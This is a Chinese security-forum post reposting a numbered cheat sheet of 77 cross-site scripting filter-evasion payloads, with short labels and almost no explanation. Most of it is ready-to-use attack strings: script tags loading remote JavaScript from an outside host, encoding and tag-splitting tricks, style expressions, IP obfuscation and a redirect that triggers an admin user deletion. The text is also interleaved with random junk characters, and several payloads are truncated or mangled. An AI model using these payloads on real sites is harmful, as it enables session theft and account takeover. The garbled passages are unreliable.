貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。+ x7 `$ `' p& y6 I# M* L
(1)普通的XSS JavaScript注入) ^, ~9 @3 j/ e \0 w: A1 M( `2 ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) h Y9 F) j" Q. q2 A& E" V( N* y(2)IMG标签XSS使用JavaScript命令
2 }' g3 I% `. u' l6 h<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>( i5 b. A: ?3 z* |4 B+ i, T
(3)IMG标签无分号无引号- a( X0 C& Y8 z
<IMG SRC=javascript:alert(‘XSS’)>
' B2 S4 N+ B6 K% z(4)IMG标签大小写不敏感7 |! Y r% o; `8 p. r$ q
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
4 s9 ~8 E6 [( x( C7 @(5)HTML编码(必须有分号)
; X" W) p2 V8 L6 i k<IMG SRC=javascript:alert(“XSS”)>
7 V p- b' i6 D* k# {6 C# C+ f# {(6)修正缺陷IMG标签
1 }+ g/ V. A+ w& i1 b; i<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> [0 w# {% w( Z6 T+ y
$ ]* C& D9 u: P5 @7 e
( T0 t8 g7 F0 [) k) R A a
(7)formCharCode标签(计算器)5 z6 e6 E' y, w% |( y+ O, u
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
3 R& l% X! W# |* W, j, S(8)UTF-8的Unicode编码(计算器)
# C) R4 f& i; I# T' Z<IMG SRC=jav..省略..S')>- U7 Q2 c8 P. B. W
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 a4 D2 n0 q6 P. m<IMG SRC=jav..省略..S')>
. y" p- l# Q _' h(10)十六进制编码也是没有分号(计算器)
/ ]/ S: ^* u- r! [( K# R; W+ O- ^<IMG SRC=java..省略..XSS')>- F( L) a9 e9 H5 x4 `
(11)嵌入式标签,将Javascript分开
9 f6 `3 Z, m. _0 O- `1 {<IMG SRC=”jav ascript:alert(‘XSS’);”>* c* m9 W; ~2 q
(12)嵌入式编码标签,将Javascript分开! w1 r K. j! r9 A- W( @
<IMG SRC=”jav ascript:alert(‘XSS’);”> W# m+ K- p+ q' ?0 ^ l
(13)嵌入式换行符
3 ^1 f, F( J, r: I3 g* X<IMG SRC=”jav ascript:alert(‘XSS’);”>2 v8 e: V) w5 r( O \6 D
(14)嵌入式回车
& J r9 W; D& e F5 C1 t4 _4 g<IMG SRC=”jav ascript:alert(‘XSS’);”>3 k% u: g8 z. N8 Q; Q- q5 {0 t
(15)嵌入式多行注入JavaScript,这是XSS极端的例子; C1 G) X9 c# @# M9 s7 ^% y. r
<IMG SRC=”javascript:alert(‘XSS‘)”>
& O' y ~! G, Q( t(16)解决限制字符(要求同页面)
) X* o0 t2 V, w% V- z$ W7 D<script>z=’document.’</script>
$ _9 l6 H7 ^9 n+ w. m4 A8 L<script>z=z+’write(“‘</script>, l4 @6 c) D3 B+ I
<script>z=z+’<script’</script>
& ^/ O( L. q9 F" _/ X<script>z=z+’ src=ht’</script>' S5 @5 t, b5 @' i, @% L5 K2 J) k
<script>z=z+’tp://ww’</script>
2 d# e, W/ }% R<script>z=z+’w.shell’</script>
) S8 @( S! v2 l: W<script>z=z+’.net/1.’</script>( T# g) F0 A" G& x: M
<script>z=z+’js></sc’</script>
: w0 \1 s: d" p* T) ~<script>z=z+’ript>”)’</script>3 ^. g/ b' f5 C& j: }
<script>eval_r(z)</script>
/ n( G' ~2 |8 B: M1 f7 ]3 U(17)空字符12-7-1 T00LS - Powered by Discuz! Board
. J/ j, g. i* Fhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
6 j4 z% q# U; J. yperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out7 l& }* V. V# x, Q( P, i. a0 S" c& U
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ l- g/ I, w: v* v. zperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
/ s% ?1 k) j M. J; \(19)Spaces和meta前的IMG标签
7 i- D* n% f' z$ s% p( \<IMG SRC=” javascript:alert(‘XSS’);”>
* F' b5 D# \8 W+ C: t(20)Non-alpha-non-digit XSS3 M" n: a/ v/ N8 T7 G
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 f: Y a% d! i0 }& ?# X(21)Non-alpha-non-digit XSS to 25 N- f) Q( U! z- |2 L: L
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 {: i. N; j L( i1 h(22)Non-alpha-non-digit XSS to 3( |1 z# j4 j k& C
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
! h2 V" j2 p0 V3 |(23)双开括号
- \" H: A- P# \0 @0 M! I<<SCRIPT>alert(“XSS”);//<</SCRIPT>
% g, X; e; ?" q$ `8 @(24)无结束脚本标记(仅火狐等浏览器)
" R1 W0 v6 w; s' R4 _# m u( U<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>8 N6 Q2 B4 X5 R2 W& w8 a
(25)无结束脚本标记2
% H9 o2 Q. [5 K" e, G6 t, U6 r<SCRIPT SRC=//3w.org/XSS/xss.js>
- u G1 N! A, I" E9 i(26)半开的HTML/JavaScript XSS
" C: g8 D0 O2 l$ ^5 O5 D<IMG SRC=”javascript:alert(‘XSS’)”
, ^: \& r1 m4 d/ o# L% \(27)双开角括号% ^1 p1 Z0 s W5 i
<iframe src=http://3w.org/XSS.html <3 S& T1 ]' R% g7 h. P l+ ? B
(28)无单引号 双引号 分号
4 Z0 z+ F; d7 C. u' b4 B<SCRIPT>a=/XSS/# a: g2 w) }) ?7 M
alert(a.source)</SCRIPT>
4 }1 x- T3 S( o& ?+ S m(29)换码过滤的JavaScript' g- f5 s F' o. l) t. Q
\”;alert(‘XSS’);//
+ x1 o5 W4 n$ O/ |) I(30)结束Title标签
( G1 b; x( F; k/ `</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 @% C4 Q0 w0 V( k* `
(31)Input Image& s% C$ l+ V: Q
<INPUT SRC=”javascript:alert(‘XSS’);”>2 y3 O- S0 W9 R9 T
(32)BODY Image
6 T/ ?8 D8 x4 E+ W<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 A+ A" A4 E* W3 l1 T4 y(33)BODY标签( S" ?* t& A1 ^0 s. e' }
<BODY(‘XSS’)>7 f2 ?" ~# K9 }7 q8 c
(34)IMG Dynsrc
, Y0 _/ ]8 b* Q/ j# v$ P7 }<IMG DYNSRC=”javascript:alert(‘XSS’)”>+ E n; F0 I2 m" s/ X! K
(35)IMG Lowsrc
6 j0 \! k$ f0 K3 ]. N6 [& \# T<IMG LOWSRC=”javascript:alert(‘XSS’)”>
" c: Y" n% y6 y( [5 K; r' M(36)BGSOUND
* [ P- n* G0 C* c c& s5 e<BGSOUND SRC=”javascript:alert(‘XSS’);”>
, \/ i8 @, L$ U(37)STYLE sheet5 ?4 w A: p9 d/ h1 t9 b9 K
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>: J; S7 {! a. \; Z/ Q" J0 E
(38)远程样式表
3 s0 n8 U: f: g<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>0 \& d- L" j- q
(39)List-style-image(列表式)& j9 v) a7 m- A; ]% f- s
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* k6 U. G/ Y7 l& P9 x$ P(40)IMG VBscript I+ O2 G% r9 g* c: W3 A: b: o
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
% \" [: \2 O$ G, ~3 G2 {(41)META链接url
* {' M) E& n J; b
: x$ x% Z: {1 i# {5 o7 _
% F; j( M R( f) W* K4 K<META HTTP-EQUIV=”refresh” CONTENT=”0;
5 u5 u9 L0 C8 `3 D( gURL=http://;URL=javascript:alert(‘XSS’);”>2 h& ~7 t7 y: B9 R; u, K9 b2 U3 P* Q5 w
(42)Iframe7 C3 ~. p+ d3 v0 G1 _
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>( l+ I9 I. `7 [6 c* z5 m
(43)Frame
# ~/ m9 U! J6 u" M<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board+ r' Y5 z, V! Z+ {
https://www.t00ls.net/viewthread ... table&tid=15267 3/6$ x, ^- ]4 |9 U0 e' J
(44)Table
' p ~' Z5 Z, J% P<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! u" b* R0 C0 W: o(45)TD" W3 |/ A( e+ \. ?4 d4 V
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>9 Y* F; R) W- Q! _$ @
(46)DIV background-image
3 w, @- f& \! S0 M<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
8 l, f0 G- T+ J( O$ a8 E; G2 B(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-. }" X* G! f. `+ z9 p& c
8&13&12288&65279)
8 L& U! G+ B4 V$ W7 f! \<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! _" J/ ~ H+ A ]( f, n# p& i* B
(48)DIV expression1 b/ {1 k; R2 Q+ ^2 T! v
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
, V0 a% O4 R9 u" i(49)STYLE属性分拆表达 S: V3 s% t& f& U! F" E/ ?
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
, i7 Z8 u) ^. O' L' z(50)匿名STYLE(组成:开角号和一个字母开头); s2 ?1 q7 g) x t7 t' B1 p t
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 t" ^+ v: _, C' I" W0 u
(51)STYLE background-image( n$ p( R( w! ~( J9 B/ K' {$ w
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A4 y1 u/ Y1 b6 E3 W" s7 D+ A: D
CLASS=XSS></A>
8 ?9 U8 i6 ?* G3 f' W! o(52)IMG STYLE方式4 H# z/ G$ c! F' E7 H3 f
exppression(alert(“XSS”))’>0 b4 P7 q5 `4 o6 h8 ~
(53)STYLE background
# J+ Y1 i$ y. K# o$ f<STYLE><STYLE
) m2 g: t$ }( htype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 r+ M- S i, A& L" U3 A1 ]4 }(54)BASE- T7 r5 i+ c# |" j) S8 T
<BASE HREF=”javascript:alert(‘XSS’);//”>
* n' P9 H/ v) ~& b7 _% l4 ](55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# L4 N0 W, N9 @; d; k! Q<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
! \/ X+ P" a; Q, z! @ i(56)在flash中使用ActionScrpt可以混进你XSS的代码
# s# F8 A1 \: W2 A# r) a: fa=”get”;, Y; `" j& I% w1 v, _, b
b=”URL(\”";& B+ o9 M' p, m* U5 J
c=”javascript:”;
7 |2 [% Z* z" S; \! z) q" zd=”alert(‘XSS’);\”)”;1 h+ b0 w6 ?+ p5 S. q0 M$ \
eval_r(a+b+c+d);8 q# O M( i6 m- w* @
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% y0 k1 s# R- q; a<HTML xmlns:xss>) B* W' _; Q1 J
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% U( |, ^' K- U: E<xss:xss>XSS</xss:xss>
8 b, I9 s' Z, e2 s) X! r& s* Q! z</HTML>
, S* M0 c, G# h3 E U; H(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" z8 U2 Z: N' T& _( f
<SCRIPT SRC=””></SCRIPT>4 S2 R' `9 Q# ^, J4 [
(59)IMG嵌入式命令,可执行任意命令
' ~' M1 D$ z4 R. j6 B<IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ Y8 b7 l2 I2 a1 [(60)IMG嵌入式命令(a.jpg在同服务器)
$ n& O7 K) G" I* h; n" f. L; ERedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
5 L0 _2 `0 N) M: Q7 U/ ^; E3 R(61)绕符号过滤
- t; [' t( V6 I, h0 b A x<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 E# ~& t1 k- L. ?(62)8 a% }: W2 p4 ~7 z! I
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, \0 t# d& Z; D$ P, I0 W9 D% P2 }(63)
. m6 H6 b( [ `% e<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
: C+ ?, D% t& V(64)
+ Y- `4 U6 F# P# q<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
4 E) R8 f" Z6 B" C c4 H(65)
B# R) W: U/ G% r! O, o<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( Y3 m* }& ]# G/ R(66)12-7-1 T00LS - Powered by Discuz! Board+ I2 @ f1 i" O
https://www.t00ls.net/viewthread ... table&tid=15267 4/68 e/ @' s6 }; d1 D2 v
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- M% M8 }: K# k& V, O4 c(67)* N9 j" q s% e* c
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>: W3 S0 f0 ]9 B# t
</SCRIPT>
7 F2 L( n5 N: M- x% P5 i(68)URL绕行0 E5 T8 d* ^# p
<A HREF=”http://127.0.0.1/”>XSS</A>
) X, V" q5 e( D& Q3 b' O(69)URL编码
2 O% N+ `0 G" |# P' l0 o<A HREF=”http://3w.org”>XSS</A>
& k2 R- H! ^2 ]- ?6 L(70)IP十进制
! L* z. ~; T0 \ s" L5 W/ j<A HREF=”http://3232235521″>XSS</A>
+ H2 w/ k! j6 X* }' G) B(71)IP十六进制
* R3 w9 m# Q0 ^1 r8 L4 \9 R9 X<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
2 i3 L# Z- A/ }- L! l8 m(72)IP八进制8 V9 a9 U: c# s
<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ Z& Y% d; r. H4 S
(73)混合编码& G& Z( @5 D5 q
<A HREF=”h
: Q1 }& E7 f2 @+ x4 |$ qtt p://6 6.000146.0×7.147/”">XSS</A>
4 Y' T" H& d. h" {$ z/ o2 q(74)节省[http:]
( E, o. H3 I" t; T5 u5 j<A HREF=”//www.google.com/”>XSS</A>8 c, d1 K0 G: Y2 ?7 B! F% M
(75)节省[www]
4 M( p+ ]5 ]. W* J, r9 n4 @<A HREF=”http://google.com/”>XSS</A>. A6 A( W7 T3 ?$ _9 f0 x# A
(76)绝对点绝对DNS
5 P9 n( ?3 ?2 M& `1 e( a ], m<A HREF=”http://www.google.com./”>XSS</A>
" q9 C( O" k1 Y8 z. n) K# B* v(77)javascript链接
% B' K! f' ]1 m8 M i$ b1 K) \<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
; H q( S% v9 |' G% ^% I
2 Q& g/ r/ q, l' ^ S原文地址:http://fuzzexp.org/u/0day/?p=14
$ `2 V2 e$ x4 f) W2 t8 `5 O
. _0 v/ O' K. X% O |
发表于 2013-4-19 19:22:37
收藏
支持
反对